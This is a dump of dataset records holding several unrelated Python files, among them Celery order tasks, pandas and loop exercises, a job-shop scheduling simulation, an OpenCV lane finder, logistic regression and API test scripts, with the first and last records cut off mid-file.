ensure that no results are saved. Saved results on daemons would cause deadlocks and fillup of disk\n@transaction.atomic\n@single_instance_task(60*10)\ndef process_settled_order():\n\tlgr = get_task_logger(__name__)\n\ttry:\n\t\torig_order = PurchaseOrder.objects.select_for_update(nowait=True).filter(Q(status__name='SETTLED'),Q(cart_processed=False))\n\t\torder = list(orig_order.values_list('id',flat=True)[:500])\n\n\t\tprocessing = orig_order.filter(id__in=order).update(cart_processed=True, date_modified=timezone.now())\n\t\tfor od in order:\n\t\t\tlgr.info('Order: %s' % od)\n\t\t\torder_background_service_call.delay(od, 'SETTLED')\n\texcept DatabaseError as e:\n\t\tlgr.info('Transaction Rolled Back')\n\t\ttransaction.set_rollback(True)\n\n\texcept Exception as e: lgr.info('Error on process settled order: %s' % e)\n\n\n@app.task(ignore_result=True) #Ignore results ensure that no results are saved. Saved results on daemons would cause deadlocks and fillup of disk\n@transaction.atomic\n@single_instance_task(60*10)\ndef process_paid_order():\n\tlgr = get_task_logger(__name__)\n\ttry:\n\t\torig_order = PurchaseOrder.objects.select_for_update(nowait=True).filter(Q(status__name='PAID'),Q(cart_processed=False))\n\t\torder = list(orig_order.values_list('id',flat=True)[:500])\n\n\t\tprocessing = orig_order.filter(id__in=order).update(cart_processed=True, date_modified=timezone.now())\n\t\tfor od in order:\n\t\t\tlgr.info('Order: %s' % od)\n\t\t\torder_background_service_call.delay(od, 'PAID')\n\texcept DatabaseError as e:\n\t\tlgr.info('Transaction Rolled Back')\n\t\ttransaction.set_rollback(True)\n\n\texcept Exception as e: lgr.info('Error on process paid order: %s' % e)\n\n\n@app.task(ignore_result=True) #Ignore results ensure that no results are saved. Saved results on daemons would cause deadlocks and fillup of disk\n@transaction.atomic\n@single_instance_task(60*10)\ndef process_callback_url():\n\tlgr = get_task_logger(__name__)\n\ttry:\n\t\tlgr.info('Process CallBack URL')\n\n\t\tall_bill = BillManager.objects.filter(Q(order__status__name='PAID',order__cart_item__api_callback_status__name='CREATED'),\\\n\t\t\t\t\t~Q(order__cart_item__api_gateway_profile=None),~Q(incoming_payment=None),\\\n\t\t\t\t\t~Q(order__cart_item__api_callback_url__in=[None,''])).values_list('id','order__cart_item__id').distinct()[:500]\n\n\t\tlgr.info('Bill %s' % all_bill)\n\t\tbill = np.asarray(all_bill)\n\n\t\tlgr.info('BillL %s' % bill.size)\n\t\tlgr.info('BillL %s' % bill)\n\t\tif bill.size>0:\n\t\t\torig_cart = CartItem.objects.select_for_update(nowait=True).filter(id__in=bill[:,1])\n\n\t\t\tlgr.info('Cart Items List %s' % bill[:,1])\n\t\t\tprocessing = orig_cart.filter(id__in=bill[:,1].tolist()).update(api_callback_status=APICallBackStatus.objects.get(name='PROCESSING'), date_modified=timezone.now())\n\t\t\ttasks = []\n\t\t\tfor b, c in bill.tolist():\n\t\t\t\tlgr.info('Call Back: %s | %s' % (b, c))\n\t\t\t\ttasks.append(callback_url_call.s(b, c))\n\n\t\t\tchunks, chunk_size = len(tasks), 500\n\t\t\tcallback_tasks= [ group(*tasks[i:i+chunk_size])() for i in range(0, chunks, chunk_size) ]\n\n\n\texcept Exception as e: lgr.info('Error on process callback url: %s' % e)\n\t#except DatabaseError as e:\n\t#\tlgr.info('Transaction Rolled Back')\n\t#\ttransaction.set_rollback(True)\n\n\n\n","sub_path":"secondary/erp/pos/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":66173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"295347966","text":"# -*- coding: utf-8 -*-\r\n\r\nimport pandas as pd\r\n\r\ninput_fname = './data/sales_2013.xlsx'\r\n# 인덱스로 사용할 열을 지정하여\r\n# 엑셀파일을 로딩하는 내용\r\n# - index_col 매개변수를 사용\r\nsales = pd.read_excel(input_fname, \r\n sheet_name='january_2013',\r\n index_col='Customer ID')\r\nprint(sales)\r\n\r\n# DataFrame의 각 열은 pandas의 Series 타입이 됩니다.\r\n# - 일차원 데이터 타입으로 인지됨\r\nsales_name = sales['Customer Name']\r\nprint(type(sales_name))\r\n\r\n# pandas의 Series 타입은 value_counts 메소드를 사용할 수\r\n# 있으며, 메소드의 실행 결과는 중복을 제거한 \r\n# 각 데이터의 개수가 반환됨\r\nsales_date = sales['Purchase Date']\r\nprint(sales_date.value_counts())\r\n\r\n# 조건식을 사용하여 데이터를 검색하는 예제\r\n# - 검색할 날자 데이터의 리스트\r\ndates = ['2013-01-01', '2013-01-11', '2013-01-31']\r\n# DataFrame을 사용하여 조건식을 만족하는 데이터를 추출하는 방법\r\n# - DataFrame변수명[출력할컬럼명][조건식]\r\n# - 조건식은 True, False의 값이 반환되는 식\r\n# - pandas의 Series 타입은 isin 메소드를 제공하며\r\n# 각 열의 데이터가 매개변수로 전달된 리스트 내부에 존재하는 경우\r\n# True의 값이 반환됨\r\nsales_condition1 = \\\r\nsales[['Customer Name', 'Sale Amount','Purchase Date']][\r\n sales['Purchase Date'].isin(dates)]\r\nprint(sales_condition1)\r\n\r\n# Sale Amount 컬럼의 값이 평균 이상인 경우의 데이터만\r\n# 추출하는 예쩨\r\nsales_condition2 = sales[['Customer Name', 'Sale Amount']][\r\n sales['Sale Amount'] >= sales['Sale Amount'].mean()]\r\nprint(sales_condition2)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"day_07/pandas/pandas_03.py","file_name":"pandas_03.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"564506180","text":"for i in range(1, 20):\n print(\"I is now {}\".format(i))\n\n# number = \"883,44,335,600,4564,3,55\"\n# for i in range(0, len(number)):\n# print(number[i]) # by using square bracket it print the character at position I\n\n# number = \"883,44,335,600,4564,3,55\"\n# for i in range(0, len(number)):\n# if number[i] in '0123456789': # display only numbers, without separators\n# print(number[i], end='') # using square bracket print the character at position I. end ='' change \\n to space\n\nnumber = \"883,44,335,600,4564,3,55\"\ncleanedNumber = ''\nfor i in range(0, len(number)):\n if number[i] in '0123456789': # display only numbers, without separators\n cleanedNumber = cleanedNumber + number[i] # number is a string. To perform math, convert to int with extra var\n# print(number[i], end='') # using square bracket print the character at position I. end ='' change \\n to space\n\nnewNumber = int(cleanedNumber) # in first block we got rid off strings and assign string numbers to new variable\nprint(\"The number is {}\".format(newNumber)) # in second block we converted our digits into the int format\n","sub_path":"forloops.py","file_name":"forloops.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"577604645","text":"# Copyright (c) 2020 Aiven, Helsinki, Finland. https://aiven.io/\n\nimport json\nimport os\nfrom abc import abstractmethod\n\nREQUIRED = {\n \"aws_access_key_id\",\n \"aws_secret_access_key\",\n \"bucket_name\",\n \"bucket_region\",\n \"max_workers\",\n \"upstream_repositories\",\n}\n\nDEFAULTS = {\n \"scratch_dir\": \"/var/tmp/\",\n \"max_workers\": 4,\n}\n\n\nclass ConfigError(ValueError):\n pass\n\n\nclass Config:\n aws_access_key_id = None\n aws_secret_access_key = None\n bucket_name = None\n bucket_region = None\n scratch_dir = None\n max_workers = None\n upstream_repositories = None\n _config = DEFAULTS\n\n def __init__(self):\n self.load()\n\n def load(self):\n self._config.update(DEFAULTS)\n self._populate_required()\n missing = REQUIRED.difference(set(self._config))\n if missing:\n raise ConfigError(f\"Missing required items: {missing}\")\n for key, value in self._config.items():\n setattr(self, key, value)\n\n @abstractmethod\n def _populate_required(self):\n pass\n\n def __repr__(self):\n return f\"{type(self).__name__}<{repr(self._config)}>\"\n\n\nclass ENVConfig(Config):\n def _populate_required(self):\n config_options = list(REQUIRED) + list(DEFAULTS)\n for key in sorted(config_options):\n value = os.environ.get(key.upper())\n if not value:\n if key not in DEFAULTS:\n raise ConfigError(f\"Missing required environment variable: {key.upper()}\")\n else:\n continue\n elif key == \"upstream_repositories\":\n value = value.split(\",\")\n elif key == \"max_workers\":\n value = int(value)\n self._config[key] = value\n\n\nclass JSONConfig(Config):\n def __init__(self, path):\n self.path = path\n super().__init__()\n\n def _populate_required(self):\n with open(self.path) as f:\n self._config.update(json.load(f))\n\n\nclass DictConfig(Config):\n def __init__(self, config_dict):\n self._config.update(config_dict)\n super().__init__()\n\n def _populate_required(self):\n pass\n","sub_path":"rpm_s3_mirror/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"554148114","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = 'admin'\n\nimport Queue\nimport threading\nfrom BidByAPI_Quo import SignUP_mainSingleUser, Bid_mainSingleUser, QA, PRD, PRDTest, PRE, SigntenderFile_mainSingleUser, ViewCalibration_mainSingleUser\n\nqueue = Queue.Queue()\nuserlist = open('user.txt', 'r')\nmy_list = userlist.readlines()\nUserCount = 197\nfor row in my_list[:UserCount]:\n queue.put(row)\n\n# 环境:QA , PRD, PRDTest, PRE\nsite = PRD\n# 招标 SysNo\nTenderID = 1100389\n# 线程数\nThreadCount = 20\n# 操作\n# step =\n\n\ndef _run():\n while 1:\n try:\n row = queue.get_nowait()\n row = row.split(',')\n try:\n # SignUP_mainSingleUser(row[0], row[1], site, TenderID)\n SigntenderFile_mainSingleUser(row[0], row[1], site, TenderID)\n # Bid_mainSingleUser(row[0], row[1], site, TenderID)\n #ViewCalibration_mainSingleUser(row[0], row[1], site, TenderID)\n except Exception as ee:\n print(ee)\n print(row[0], 'error')\n except Exception as e:\n print(e)\n return\n\n\nts = [threading.Thread(target=_run, name='threading1') for i in range(ThreadCount)]\nfor t in ts:\n t.start()\nt.join()\n","sub_path":"Python3-BidByAPI/BatchBid.py","file_name":"BatchBid.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"266150708","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n##-------- [PPC] Jobshop Scheduling ---------\n# * Author: Colin, Lee\n# * Date: Apr 30th, 2020\n# * Description:\n# Using the event-driven scheuling method\n# to solve the JSS prob. Here is a sample\n# code with the style of OOP. Feel free to\n# modify it as you like.\n##--------------------------------------------\n#\n\nimport os\nimport numpy as np\nimport pandas as pd\nfrom gantt_plot import Gantt\n\ninfinity = float('inf')\n\n#entity\nclass Order:\n def __init__(self, ID, AT, DD, routing, PT):\n self.ID = ID\n self.AT = AT #AT: arrival time\n self.DD = DD #DD: due date\n\n self.PT = PT #PT: processing time\n self.routing = routing\n self.progress = 0\n\n#resource in factory\nclass Source:\n def __init__(self, order_info):\n self.order_info = order_info\n self.output = 0\n\n def arrival_event(self, fac):\n order_num = self.order_info.shape[0] #num of total orders\n\n #generate and release the order\n ID = self.order_info.loc[self.output, \"ID\"]\n routing = self.order_info.loc[self.output, \"routing\"].split(',')\n PT = [int(i) for i in self.order_info.loc[self.output, \"process_time\"].split(',')]\n DD = self.order_info.loc[self.output, \"due_date\"]\n AT = T_NOW\n order = Order(ID, AT, DD, routing, PT)\n if LOG == True:\n print(\"{} : order {} release.\".format(T_NOW, order.ID))\n\n self.output += 1\n\n #update the future event list - next order arrival event\n if self.output < order_num:\n fac.event_lst.loc[\"Arrival\"][\"time\"] = self.order_info.loc[self.output, \"arrival_time\"]\n else:\n fac.event_lst.loc['Arrival']['time'] = infinity\n\n #send order to correlated station\n target = order.routing[order.progress]\n machine = fac.machines[target]\n machine.buffer.append(order)\n\n #update the future event list - dispatch machines to process the jobs\n if machine.state == 'idle':\n fac.event_lst.loc[\"dispatching\"]['time'] = T_NOW\n\nclass Machine:\n def __init__(self, ID, DP_rule):\n self.ID = ID\n self.state = 'idle'\n self.buffer = []\n self.wspace = [] #wspace: working space\n self.DP_rule = DP_rule\n\n def start_processing(self, fac):\n #check state\n if self.state == 'idle':\n #get a new order from buffer by DP_rule\n if len(self.buffer) > 0:\n if self.DP_rule == \"FIFO\":\n order = self.buffer[0]\n elif self.DP_rule == \"EDD\":\n idx = np.argmin([j.DD for j in self.buffer])\n order = self.buffer[idx]\n elif self.DP_rule == \"SPT\":\n idx = np.argmin([j.PT[j.progress] for j in self.buffer])\n order = self.buffer[idx]\n\n #remove order from buffer\n self.buffer.remove(order)\n\n #start processing the order\n self.wspace.append(order)\n self.state = 'busy'\n processing_time = order.PT[order.progress]\n\n #[Gantt plot preparing] udate the start/finish processing time of machine\n fac.gantt_plot.update_gantt(self.ID, T_NOW, processing_time, order.ID)\n if LOG == True:\n print(\"{} : machine {} start processing order {} - {} progress\".format(T_NOW, self.ID, order.ID, order.progress))\n\n #update the future event list - job complete event\n fac.event_lst.loc[\"{}_complete\".format(self.ID)]['time'] = T_NOW + processing_time\n order.progress += 1\n\n def end_process_event(self, fac):\n order = self.wspace[0]\n if LOG == True:\n print(\"{} : machine {} complete order {} - {} progress\".format(T_NOW, self.ID, order.ID, order.progress))\n self.wspace.remove(order)\n self.state = 'idle'\n\n #send the processed order to next place\n if order.progress >= len(order.routing):\n #update factory statistic\n fac.throughput += 1\n #update order statistic\n fac.update_order_statistic(order)\n else:\n #send the order to next station\n target = order.routing[order.progress]\n next_machine = fac.machines[target]\n next_machine.buffer.append(order)\n\n #update the future event list - wait for the dispatching to get a new job\n fac.event_lst.loc[\"dispatching\"]['time'] = T_NOW\n fac.event_lst.loc[\"{}_complete\".format(self.ID)][\"time\"] = infinity\n\nclass Factory:\n def __init__(self, order_info, DP_rule):\n self.order_info = order_info\n self.DP_rule = DP_rule\n self.event_lst = pd.DataFrame(columns=[\"event_type\", \"time\"])\n\n #[Plug in] tool of gantt plotting\n self.gantt_plot = Gantt()\n\n #statistics\n self.throughput = 0\n self.order_statistic = pd.DataFrame(columns = [\"ID\", \"release_time\", \"complete_time\", \"due_date\", \"flow_time\", \"tardiness\", \"lateness\"])\n\n #build ur custom factory\n self.__build__()\n\n def __build__(self):\n self.source = Source(self.order_info)\n self.machines = {'A': Machine('A', self.DP_rule),\n 'B': Machine('B', self.DP_rule),\n 'C': Machine('C', self.DP_rule)}\n\n def initialize(self, order_info):\n self.event_lst.loc[0] = [\"Arrival\", order_info.loc[0, \"arrival_time\"]]\n self.event_lst.loc[1] = [\"A_complete\", infinity]\n self.event_lst.loc[2] = [\"B_complete\", infinity]\n self.event_lst.loc[3] = [\"C_complete\", infinity]\n self.event_lst.loc[4] = [\"dispatching\", infinity]\n self.event_lst = self.event_lst.set_index('event_type')\n\n def next_event(self, stop_time):\n global T_NOW, T_LAST\n T_NOW, T_LAST = infinity, infinity\n self.initialize(self.order_info)\n T_NOW = self.event_lst.min()[\"time\"]\n event_type = self.event_lst['time'].astype(float).idxmin()\n\n while T_NOW < stop_time:\n # print()\n # print(self.event_lst)\n # print()\n self.event(event_type)\n T_LAST = T_NOW\n T_NOW = self.event_lst.min()[\"time\"]\n event_type = self.event_lst['time'].astype(float).idxmin()\n\n T_NOW = stop_time\n self.makespan = T_LAST\n\n def event(self, event_type):\n #Arrival event\n if event_type == 'Arrival':\n self.source.arrival_event(self)\n\n #Complete event\n elif event_type == 'A_complete':\n self.machines['A'].end_process_event(self)\n elif event_type == 'B_complete':\n self.machines['B'].end_process_event(self)\n elif event_type == 'C_complete':\n self.machines['C'].end_process_event(self)\n\n #Dispatch event\n else:\n for mc in self.machines.values():\n mc.start_processing(self)\n self.event_lst.loc[\"dispatching\"]['time'] = infinity\n\n def update_order_statistic(self, order):\n ID = order.ID\n AT = order.AT\n DD = order.DD\n complete_time = T_NOW\n flow_time = complete_time - AT\n lateness = complete_time - DD\n tardiness = max(0, lateness)\n self.order_statistic.loc[ID] = [ID, AT, complete_time, DD, flow_time, tardiness, lateness]\n\n\nLOG = True\nstop_time = 500\n\nif __name__ == '__main__':\n #read the input data sheet\n data_dir = os.getcwd() + \"/data/\"\n order_info = pd.read_excel(data_dir + \"order_information.xlsx\")\n\n #data preprocessing\n order_info = order_info.sort_values(['arrival_time']).reset_index(drop=True)\n\n #choose the dispatching policy u'd like\n DP_rule = 'EDD' # 'SPT' #\n\n #build the factory\n fac = Factory(order_info, DP_rule)\n\n #start the simulation\n fac.next_event(stop_time)\n\n #output result\n print(fac.order_statistic.sort_values([\"ID\"]))\n print(\"Makespan = \", fac.makespan)\n fac.gantt_plot.draw_gantt()\n","sub_path":"src/ppc_jobShop.py","file_name":"ppc_jobShop.py","file_ext":"py","file_size_in_byte":8178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"91242843","text":"from exceptions import WrongArgumentException\n\n\nclass CLI:\n\n def __init__(self, fd):\n self.__fd = fd\n self._commands = {\n \"meal\": fd.add_meal,\n \"list\": fd.list_diary,\n \"exit\": self.__exit,\n \"help\": self.__help_message\n }\n self.__is_in_program = True\n\n def __help_message(self, *args):\n return \"Help message:\\n\\\n1.meal - add meal to diary.\\n\\\n2.list
- list all meals for that day.\\n\\\n3.help - show help message.\\n\\\n4.exit - exit from diary.\\n\"\n\n def __exit(self, *args):\n self.__is_in_program = False\n return \"Goodbye\"\n\n def start(self):\n print(\"Hello and welcome!\")\n print(self.__help_message())\n\n while self.__is_in_program:\n user_input = input(\"Enter command> \")\n split_user_input = user_input.split()\n argument = ''\n try:\n if len(split_user_input) == 0:\n raise WrongArgumentException(\"You\\\nhave to enter some command!\")\n elif len(split_user_input) > 1:\n argument = split_user_input[1]\n\n command = split_user_input[0]\n\n print(self._commands[command](argument))\n except WrongArgumentException as e:\n print(e)\n except WrongDimensionexception as e:\n print(e)\n except:\n print(\"Something went wrong. Try again!\")\n","sub_path":"week01/food_diary_extended/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"330435959","text":"import pandas as pd\r\npd.plotting.register_matplotlib_converters()\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nprint(\"This is how SearchTrend behave \")\r\n\r\n# Path of the file to read\r\nSearchTrend = \"SearchTrend.csv\"\r\n\r\n# Read the file into a variable Search_data\r\nSearch_data = pd.read_csv(SearchTrend, index_col=\"date\", parse_dates=True)\r\n# Print the first 5 rows of the data\r\nprint(Search_data.head())\r\n\r\n\r\n# Set the width and height of the figure\r\nplt.figure(figsize=(16,6))\r\n\r\n# Line chart showing how SearchTrend evolved over time\r\nsns.lineplot(hue=\"region\", style=\"event\" , data=Search_data)\r\nplt.title(\"Search Trend of Influences as of years\")\r\nplt.xlabel('Years(2016 - 2020)')\r\nplt.ylabel('Search Trend')\r\n#plt.show()\r\nplt.savefig('Searchtrends.png')\r\n","sub_path":"CovidProjects0409/deseases_nature.py","file_name":"deseases_nature.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"518039530","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n\nif __name__ == '__main__':\n arr = []\n result = -100000\n \n for _ in range(6):\n arr.append(list(map(int, input().rstrip().split())))\n \n for ver in range(0, 4):\n for row in range(0, 4):\n a = arr[0 + ver][0 + row]\n b = arr[0 + ver][1 + row]\n c = arr[0 + ver][2 + row]\n d = arr[1 + ver][1 + row]\n e = arr[2 + ver][0 + row]\n f = arr[2 + ver][1 + row]\n g = arr[2 + ver][2 + row]\n \n if (a, b, c, d, e, f, g) != 0:\n if result < sum([a, b, c, d, e, f, g]):\n result = sum([a, b, c, d, e, f, g]) \n \n print(result)","sub_path":"Python/30Days/Day 11 2D Arrays.py","file_name":"Day 11 2D Arrays.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"37116968","text":"import RPLidar\n \n# Setup the RPLidar\nPORT = '/dev/ttyUSB0'\nlidar = RPLidar(None, PORT)\n\nmax_distance = 0\n\ndef process_data(data):\n global max_distance\n for angle in range(360):\n distance = data[angle]\n if distance > 0: # ignore initially ungathered data points\n max_distance = max([min([5000, distance]), max_distance])\n radians = angle * pi / 180.0\n x = distance * cos(radians)\n y = distance * sin(radians)\n point = (160 + int(x / max_distance * 119), 120 + int(y / max_distance * 119))\n print(point)\n \nscan_data = [0]*360\n \ntry:\n print(lidar.info)\n for scan in lidar.iter_scans():\n for (_, angle, distance) in scan:\n scan_data[min([359, floor(angle)])] = distance\n process_data(scan_data)\n \nexcept KeyboardInterrupt:\n print('Stoping.')\nlidar.stop()\nlidar.disconnect()","sub_path":"rplidar/rplidar_distance_01.py","file_name":"rplidar_distance_01.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"147099829","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport scipy.optimize as opt\n\nfrom cost import log_cost\nfrom map_feature import map_feature\nfrom predict import predict\n\n\n# Logistic Regression using scipy.optimize.minimize and regularization\n\n\n# Load Data\n\nfilename = 'microchip_tests.txt'\ndf = pd.read_csv(filename, header=None, names=['Test 1', 'Test 2', 'Accepted'])\n\n\n# Plot Data\n\npositive = df[df['Accepted'].isin([1])]\nnegative = df[df['Accepted'].isin([0])]\n\nplt.scatter(positive['Test 1'], positive['Test 2'], s=15, c='b', marker='o', label='Accepted')\nplt.scatter(negative['Test 1'], negative['Test 2'], s=15, c='r', marker='x', label='Not Accepted')\n\nplt.legend()\nplt.xlabel(\"Microchip Test 1\")\nplt.ylabel(\"Microchip Test 2\")\nplt.show()\n\n\n# Convert DataFrames to ndarrays\n\ndf.insert(0, 'Ones', 1)\n\ncols = df.shape[1]\nx = df.iloc[:, 0:cols-1]\ny = df.iloc[:, cols-1:cols]\n\nx = x.values\ny = y.values\n\n# Map Features (for microchip test)\nx = map_feature(x[:, 1], x[:, 2], degree=6)\n\n# Create Theta\ntheta = np.array([[0 for _ in range(x.shape[1])]])\n\n# Set Hyperparameter\nhyper_p = 0.01\n\n\n# Minimize Function\n\noptions = {'maxiter': 400}\nres = opt.minimize(log_cost, theta, (x, y, hyper_p), jac=True, method='TNC', options=options)\n\ncost = res.fun\nprint(f\"The current cost is: {cost}\")\nnew_theta = res.x\n\n\n# Determine Accuracy\n\naccuracy = predict(new_theta, x, y)\nprint(f\"Accuracy = {accuracy}%\")\n","sub_path":"logistic-regression/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441345096","text":"'''\n单独提取cookies,然后传递\n'''\nimport requests\n\nclass Mtx_Order():\n\n def __init__(self):\n self.ip = 'http://121.42.15.146:9090'\n self.headers = {'X-Requested-With': 'XMLHttpRequest'}\n\n def login(self):\n url = self.ip + '/mtx/index.php?s=/index/user/login.html'\n data = {\n 'accounts': 'li',\n 'pwd': '123456'\n }\n res = requests.post(url=url,headers=self.headers,data=data)\n return res.cookies\n\n def order(self):\n url = self.ip + '/mtx/index.php?s=/index/buy/add.html'\n cookies = self.login()\n print(cookies)\n data = {\n 'goods_id': 5,\n 'buy_type': 'goods',\n 'stock': 1,\n 'spec': '',\n 'ids': '',\n 'address_id': 1380,\n 'payment_id': 2,\n 'user_note': '',\n 'site_model': 0\n }\n res = requests.post(url=url,headers=self.headers,data=data,cookies=cookies)\n print(res.text)\n\nif __name__ == '__main__':\n obj = Mtx_Order()\n # obj.login()\n obj.order()","sub_path":"mtxapi/api/Mtx_order_cookies.py","file_name":"Mtx_order_cookies.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"565450478","text":"import numpy as np\nimport cv2\nimport time\n\nimport socket\nimport sys\nimport pickle\nimport struct\n\n#Gibt Koordinatenpunkte der Linie relativ zum Bild zurück\ndef make_coordinates(image, line_parameters):\n slope, intercept = line_parameters\n y1 = image.shape[0]\n y2 = int(y1*(3/5)) #1 / relative y-Länge der Linien\n x1 = int((y1 - intercept)/slope)\n x2 = int((y2 - intercept)/slope)\n return np.array([x1, y1, x2, y2])\n\n\n#Berechnet die durchschnittliche linke/rechte Linie uns gibt diese zurück\ndef average_slope_intercept(image, lines):\n left_fit = [] #Koordinaten der linken Linie\n right_fit = [] #Koordinaten der rechten Linie\n\n try:\n for line in lines:\n x1, y1, x2, y2 = line.reshape(4)\n parameters = np.polyfit((x1, x2), (y1, y2), 1)\n slope = parameters[0]\n intercept = parameters[1]\n if slope < 0:\n left_fit.append((slope, intercept))\n else:\n right_fit.append((slope, intercept))\n left_fit_average = np.average(left_fit, axis=0)\n right_fit_average = np.average(right_fit, axis = 0)\n except Exception as e:\n print('Ex ', e)\n return None\n\n try:\n left_line = make_coordinates(image, left_fit_average)\n right_line = make_coordinates(image, right_fit_average)\n return np.array([left_line, right_line])\n except Exception as e:\n print('Exception in function \\'average_slope_intercept\\'\\n', e) #print error to console\n return None\n\n\n#Gibt schwarzes Bild mit weißen Kanten zurück\ndef canny(image):\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n blur = cv2.GaussianBlur(gray, (5, 5), 0)\n canny = cv2.Canny(blur, 50, 150) #parameter für lower und higher treshold\n return canny\n\n\n#Zeichnet alle Linien auf das line_image\ndef display_lines(image, lines):\n line_image = np.zeros_like(image)\n if lines is not None:\n for x1, y1, x2, y2 in lines:\n cv2.line(line_image, (x1, y1), (x2, y2), (255, 0, 0), 10) #blue\n return line_image\n\n\n#Schwaerzt alle Pixel im unwichtigen Bereich aus\ndef region_of_interest(image):\n height = image.shape[0]\n polygons = np.array([[(200, height), (1100, height), (550, 250)]])\n mask = np.zeros_like(image)\n cv2.fillPoly(mask, polygons, 255)\n masked_image = cv2.bitwise_and(image, mask)\n return masked_image\n\n\n#Skaliert das Bild auf eine neue Groesse\ndef rescale_frame(frame, percent):\n width = int(frame.shape[1] * percent/100)\n height = int(frame.shape[0] * percent/100)\n dim = (width, height)\n return cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)\n\n\ndef socket_connect():\n socket1=socket.socket(socket.AF_INET, socket.SOCK_STREAM) #SOCK_STREAM ist TCP SOCK_DGRAM ist UDP\n socket1.connect(('localhost', 8089))\n return socket1\n\n\ndef send_frame(frame, scale):\n smallframe = rescale_frame(frame, scale)\n data = pickle.dumps(smallframe)\n message_size = struct.pack(\"=L\", len(data))\n clientsocket.sendall(message_size + data)\n\n\ndef run_LaneFinder(frame):\n canny_image = canny(frame)\n cropped_image = region_of_interest(canny_image)\n lines = cv2.HoughLinesP(cropped_image, 2, np.pi/180, 100, np.array([]), minLineLength=40, maxLineGap=5) #findet Linien (bild, pixelgröße des Rasters, Winkelgenauigkeit, leeres Array, minLineLength, maxLineGap)\n averaged_lines = average_slope_intercept(frame, lines)\n line_image = display_lines(frame, averaged_lines)\n combo_image = cv2.addWeighted(frame, 0.2, line_image, 1, 1) #Kombiniert 2 Bilder mit Gewichtung 0.8-1 und Gamma 1 \n return combo_image\n\n\n#MAIN\nclientsocket = socket_connect()\ncap = cv2.VideoCapture(\"Parkour1.mp4\")\nwhile(cap.isOpened()):\n _, frame = cap.read()\n #frame = cv2.inRange(frame, (0, 0, 0), (50, 50, 50))\n\n result = run_LaneFinder(frame)\n\n #test\n #tresh = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\n gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\n ret, tresh = cv2.threshold(gray, 40, 255, cv2.THRESH_BINARY)\n #/test\n\n cv2.imshow('result', tresh)\n #send_frame(frame, 50)\n #time.sleep(0.05)\n\n if cv2.waitKey(1) == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"FindingLanes/lanes.py","file_name":"lanes.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"6056192","text":"counter = 10\nwhile counter > 0:\n print(counter)\n counter -= 1\n\n\n\n\n# While dolzen imet uslovie vqhoda iz cqkla\n# условно бесконечный цикл, vozvrawaet obratno\n\n\n'''x = 10\nwhile True: 'Beskone4nqi cqkl '\n print(x)\n x = x ** 2'''\n\n'''condition = True\nwhile condition:\n id_code = input('Please enter ID:')\n if len(id_code) ==11:\n condition = False\n elif id_code == 'Exit':\n condition = False\n \n \nprint(id_code)'''\n\n\nx = 5\nwhile x != 20:\n print(x)\n x -= 1\n","sub_path":"007_002_Cycle(While)_Repeating.py","file_name":"007_002_Cycle(While)_Repeating.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"596923641","text":"'''\nMode\tDescription\n'r'\tOpen a file for reading. (default)\n'w'\tOpen a file for writing. Creates a new file if it does not exist or truncates the file if it exists.\n'x'\tOpen a file for exclusive creation. If the file already exists, the operation fails.\n'a'\tOpen for appending at the end of the file without truncating it. Creates a new file if it does not exist.\n't'\tOpen in text mode. (default)\n'b'\tOpen in binary mode.\n'+'\tOpen a file for updating (reading and writing)\n'''\ndef main():\n f= open(\"dhanyatest.txt\",\"+\")\n for i in range(50,61):\n f.write(\"This is new line %d\\r\\n\" % (i)) \n f.close()\n #Open the file back and read the contents\n f=open(\"dhanyatest.txt\", \"+\")\n if(f.mode == 'r'):\n contents 